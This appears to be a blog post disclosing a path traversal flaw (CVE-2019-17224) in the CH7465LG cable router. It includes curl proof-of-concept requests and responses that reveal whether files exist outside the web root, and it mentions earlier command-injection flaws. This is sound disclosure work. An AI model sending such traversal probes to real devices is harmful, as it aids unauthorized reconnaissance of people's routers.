Again a vunerability in cable router CH7465LG (CVE-2019-17224)

The cable modem/router CH7465LG is provided by various ISP in Europe, like UPC from Switzerland, Magenta from Austria, Unitymedia from Germany or Ziggo from Netherlands.

The web interface offers the ping and traceroute features. A Security Evaluation Report published in 2016 by SEARCH-LAB pointed out two vulnerabilities in these functions found in the firmware version CH7465LG-NCIP-4.50.18.13-NOSH: the parameters inserted by the user were not sanitized and there was no authentication required by the API functions supposed to pass these parameters to the shell binaries ping and traceroute. As recently described on xitan.me, the only improvement on firmware version CH7465LG-NCIP-6.12.18.24-5p8-NOSH was an input validation on the web interface. A remote attacker could still send manipulated parameters and execute commands on the shell (CVE-2019-13025). The blog post announced that more vulnerabilities were existing in the web interface, so I decided to look at them.

Analyzing the latest firmware version CH7465LG-NCIP-6.12.18.25-2p6-NOSH, I discovered a vulnerability to the path traversal attack, which can be exploited remotely in order to detect if a file exists outside the web root directory or not.

Proof of Concept

According with the SEARCH-LAB report, the ping results are written into /var/tmp/ping_result. An http request for that file redirects to the login page.

$ curl -I http://192.168.0.1/%2f/var/tmp/ping_result
HTTP/1.1 302 Moved Temporarily
Location: ../index.html
Server: NET-DK/1.0
Date: Thu, 26 Sep 2019 22:24:07 GMT
Connection: close
Set-Cookie: sessionToken=1245054720; path=/;

After launching a ping from the webinterface leading the file to be touched and written:

$ curl -I http://192.168.0.1/%2f/var/tmp/ping_result
HTTP/1.1 404 Not Found
Server: NET-DK/1.0
Date: Thu, 26 Sep 2019 21:49:35 GMT
Content-Type: text/html

The 404 http code returned means probably the file is not served because it does not have a registered MIME type.

Severity:

To know whether a file exists on a remote system or not, can be useful to fingerprint the installed firmware version and to check for vulnerability patches being installed or not.

One thought on “Again a vunerability in cable router CH7465LG (CVE-2019-17224)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Create your website at WordPress.com
Get started
%d bloggers like this: